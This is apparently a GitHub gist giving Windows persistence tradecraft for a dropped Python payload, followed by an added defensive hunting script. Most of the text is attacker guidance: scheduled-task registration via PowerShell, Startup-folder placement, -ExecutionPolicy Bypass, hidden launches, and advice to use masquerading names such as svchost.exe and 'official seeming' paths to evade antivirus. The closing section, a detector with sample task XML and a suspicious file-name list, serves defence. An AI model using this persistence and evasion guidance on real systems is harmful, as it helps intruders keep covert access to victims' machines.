@hyp3ri0n-ng
Last active March 21, 2024 19:55
Python persistence (simple but works so shut it!)

Re persistence, I've never liked the "super stealthy" methods I see out there. Every once in a while there's a really nice one that actually does bypass things, but then it gets attention and is mitigated, or it gets overwritten when you infect that obscure DLL and the user updates the file. In my experience, KEEP IT SIMPLE. I like Python. Your payload is a .py script, not a compiled executable, and the interpreter you drop next to it is a stock build of python.exe, so no AV is going to pick either one up on its own (hell, you can throw whole folders on there if you don't want to use a single static .exe). Name it something like C:\ProgramData\Win32runtime\dlls\annoyingly\long\official\seeming\path\<ALL THE PYTHONS>

Most "real" reverse engineers and malware writers scoff at this, but hell I've been using this for a decade and it just works.

C:\> powershell.exe -NoProfile -c "$t = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Friday -At 3am; $a = New-ScheduledTaskAction -Execute 'C:\python\path\python.exe' -Argument 'my_script.py myarg1 myarg2' -WorkingDirectory 'C:\my_py_script_dir\'; Register-ScheduledTask 'My Task' -Action $a -Trigger $t"

(All one line. Keep the outer quotes double and everything inside single so cmd hands the string to PowerShell intact; -WorkingDirectory is a parameter of New-ScheduledTaskAction, not part of -Argument.)

Or, if you don't hate yourself and can run an interactive PowerShell on the box you land on, do it from PowerShell and write a script:

# scheduleMyTask.ps1
# Weekly trigger, Fridays at 03:00
$taskTrigger = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Friday -At 3am

# Run the dropped interpreter against the script; -WorkingDirectory lets the script use a relative path
$taskAction = New-ScheduledTaskAction -Execute 'C:\python\path\python.exe' -Argument 'my_script.py myarg1 myarg2' -WorkingDirectory 'C:\my_py_script_dir\'

Register-ScheduledTask 'My Task' -Action $taskAction -Trigger $taskTrigger

Then from PowerShell: PS> .\scheduleMyTask.ps1 (from the same dir as the script). Or from CMD: C:\> powershell.exe -ExecutionPolicy Bypass -Command "& 'C:\scheduleMyTask.ps1'" or C:\> powershell.exe -ExecutionPolicy Bypass -File C:\scheduleMyTask.ps1. The -ExecutionPolicy Bypass matters: the default policy on client Windows is Restricted and refuses to run an unsigned .ps1 at all. Confirm it took with PS> Get-ScheduledTask 'My Task' | Get-ScheduledTaskInfo, which also shows the next run time.

Another option is a self-scheduling script in Python :). Then you really only have to manage one file. The only downside is that if this is for work, you can't blame Windows for "why it didn't run your perfectly configured task":

# schedule_this.py
# needs: pip install schedule   (the package and module are both named "schedule")

import time
import schedule

def do_my_thang():
    # use a context manager: open(...).write(...) returns a byte count, so
    # chaining .close() onto it raises AttributeError
    with open("C:\\dothang.txt", "w") as f:
        f.write("I'm just doing my thang.")
    # note: schedule does not catch exceptions raised by a job; one that
    # escapes propagates out of run_pending() and ends the loop below

if __name__ == "__main__":
    schedule.every(6).hours.do(do_my_thang)
    schedule.every(3).days.do(do_my_thang)
    # As many schedules as you want

    while True:
        schedule.run_pending()
        time.sleep(1)


----------


# Examples from docs: 
[ReadTheDocs][1]
# Run job every 3 second/minute/hour/day/week,
# Starting 3 second/minute/hour/day/week from now
schedule.every(3).seconds.do(job)
schedule.every(3).minutes.do(job)
schedule.every(3).hours.do(job)
schedule.every(3).days.do(job)
schedule.every(3).weeks.do(job)

# Run job every minute at the 23rd second
schedule.every().minute.at(":23").do(job)

# Run job every hour at the 42nd minute
schedule.every().hour.at(":42").do(job)

# Run jobs every 5th hour, 20 minutes and 30 seconds in.
# If current time is 02:00, first execution is at 06:20:30
schedule.every(5).hours.at("20:30").do(job)

# Run job every day at specific HH:MM and next HH:MM:SS
schedule.every().day.at("10:30").do(job)
schedule.every().day.at("10:30:42").do(job)
schedule.every().day.at("12:42", "Europe/Amsterdam").do(job)

# Run job on a specific day of the week
schedule.every().monday.do(job)
schedule.every().wednesday.at("13:15").do(job)
schedule.every().minute.at(":17").do(job)    

It also has a ton more functionality that seems nice. How I'd use it: drop it in the Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup for the current user) so it runs at every logon; Startup is a logon hook, not a boot hook, so if it has to run with nobody logged in, that's what a scheduled task with a New-ScheduledTaskTrigger -AtStartup trigger is for. To kick it off the first time without waiting, from CMD: START /B "" "C:\full\python\path\python.exe" whatever.py (the empty "" is the window title; START treats the first quoted argument as a title, so quoting the whole command just opens a console named after it). From PowerShell in the script's directory: Start-Process -WindowStyle Hidden 'C:\full\python\path\python.exe' -ArgumentList 'whatever.py'. A trailing & backgrounds a command in PowerShell 7+ only, not in the Windows PowerShell 5.1 that ships with Windows.


----------


So there's a bunch of options for ya. Get rid of cmd though unless you're still on Windows 95 :P; it's touchy and terrible, and individual commands implement their own syntax for things like escape characters and argument quoting (looking at you, Services). I'd rather throw my computer out the window (ha) and do the task manually.
This method is primitive of course, but I've found that even bundling a Python exe and dropping it in Startup gets caught way, way less than a polymorphic whatever-the-fuck 0.4 KB file or implant somewhere. In my experience, keeping it as simple and stupid as possible is the best way: less suspicious, and almost never detected.
In the Startup folder, name it something official sounding: `win32runtime.exe`, `svchost.exe`, etc. (with the caveat that a well-known name like svchost.exe anywhere outside System32 is a textbook hunt query, so a plausible but unfamiliar name draws less attention than a famous one in the wrong place).
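The flip side, as an added example that is not part of the original gist: what the task-registration and Startup-folder tricks above look like to someone hunting for them. The script parses scheduled-task definitions in the XML format Windows keeps under C:\Windows\System32\Tasks (the same text Export-ScheduledTask returns) and a Startup-folder listing, and flags the tells a dropped interpreter leaves: an action executing from a user-writable root such as ProgramData, a python.exe outside the program directories, a script directory the user can write to, and a System32 name in the wrong place. The root lists, reason strings, the two task XML samples and the Startup file names are constructed for illustration; tune the allowlists to your estate (per-user Python installs under AppData\Local\Programs\Python, for instance, will trip the ProgramData/Users check and need an exception).

```python
"""Hunt for dropped-interpreter persistence in scheduled tasks and Startup folders.

Editor-added example, not code from the gist. Sample task XML and Startup
listings below are constructed; the path allowlists are starting points.
"""
import ntpath
import os
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Roots any user can write to without admin; installed jobs rarely run from here.
USER_WRITABLE_ROOTS = (r"c:\programdata", r"c:\users", r"c:\windows\temp", r"c:\temp")
# Where a legitimately installed interpreter normally lives (assumption; extend per estate).
PROGRAM_ROOTS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")
INTERPRETERS = {"python.exe", "pythonw.exe", "py.exe", "pyw.exe"}
# Names whose only legitimate home is System32/SysWOW64.
SYSTEM_ONLY = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Real software drops .lnk shortcuts in Startup; a bare binary or script is unusual.
BARE_STARTUP_EXT = (".exe", ".py", ".pyw", ".bat", ".cmd", ".vbs", ".js", ".ps1")


def _norm(path):
    """Lower-case and strip quotes/whitespace so prefix checks work on Windows paths."""
    return path.strip().strip('"').lower()


def _under(path, roots):
    """True if path equals one of roots or sits below it (case already folded)."""
    return any(path == r or path.startswith(r + "\\") for r in roots)


def flag_task_xml(xml_text):
    """Return [(reason, detail)] for every suspicious <Exec> action in one task definition."""
    findings = []
    root = ET.fromstring(xml_text)
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = _norm(ex.findtext("t:Command", default="", namespaces=TASK_NS))
        wd = _norm(ex.findtext("t:WorkingDirectory", default="", namespaces=TASK_NS)).rstrip("\\")
        exe = ntpath.basename(cmd)
        if _under(cmd, USER_WRITABLE_ROOTS):
            findings.append(("exec_from_user_writable_path", cmd))
        if exe in INTERPRETERS and not _under(cmd, PROGRAM_ROOTS):
            findings.append(("interpreter_outside_program_dirs", cmd))
        if exe in INTERPRETERS and _under(wd, USER_WRITABLE_ROOTS):
            findings.append(("script_dir_user_writable", wd))
        if exe in SYSTEM_ONLY and not _under(cmd, SYSTEM_DIRS):
            findings.append(("system_binary_name_outside_system32", cmd))
    return findings


def flag_startup_entry(filename):
    """Flag one file name from a Startup folder listing."""
    name = filename.strip().lower()
    findings = []
    if name in SYSTEM_ONLY:
        findings.append(("system_binary_name_in_startup", name))
    if name.endswith(BARE_STARTUP_EXT):
        findings.append(("bare_executable_or_script_in_startup", name))
    return findings


def scan_startup_dir(path):
    """Apply flag_startup_entry to every file in a real Startup folder."""
    return {n: flag_startup_entry(n) for n in os.listdir(path) if flag_startup_entry(n)}


# Constructed sample: the task the PowerShell above would register, with the
# interpreter dropped under the "official seeming" ProgramData path from the gist.
SAMPLE_TASK_PY = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-03-22T03:00:00</StartBoundary>
    <ScheduleByWeek><DaysOfWeek><Friday /></DaysOfWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>
  </CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\ProgramData\\Win32runtime\\dlls\\python.exe</Command>
    <Arguments>my_script.py myarg1 myarg2</Arguments>
    <WorkingDirectory>C:\\ProgramData\\Win32runtime\\dlls\\</WorkingDirectory>
  </Exec></Actions>
</Task>"""

# Constructed sample of an ordinary installed job for comparison.
SAMPLE_TASK_OK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec>
    <Command>C:\\Program Files\\Contoso Backup\\backup.exe</Command>
    <Arguments>--nightly</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed Startup listing: two gist-style names, one script, one normal shortcut.
SAMPLE_STARTUP = ["svchost.exe", "win32runtime.exe", "schedule_this.py", "OneDrive.lnk"]

if __name__ == "__main__":
    for label, xml in (("My Task", SAMPLE_TASK_PY), ("Contoso Backup", SAMPLE_TASK_OK)):
        print(label, flag_task_xml(xml))
    for name in SAMPLE_STARTUP:
        print(name, flag_startup_entry(name))
```

On a live box, feed flag_task_xml the contents of each file under C:\Windows\System32\Tasks (they are UTF-16, so read them as bytes) and point scan_startup_dir at both the per-user and the all-users Startup folder; the interpreter-outside-program-dirs rule is noisy on developer machines, so treat the hits as triage queues rather than verdicts.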



  [1]: https://schedule.readthedocs.io/en/stable/examples.html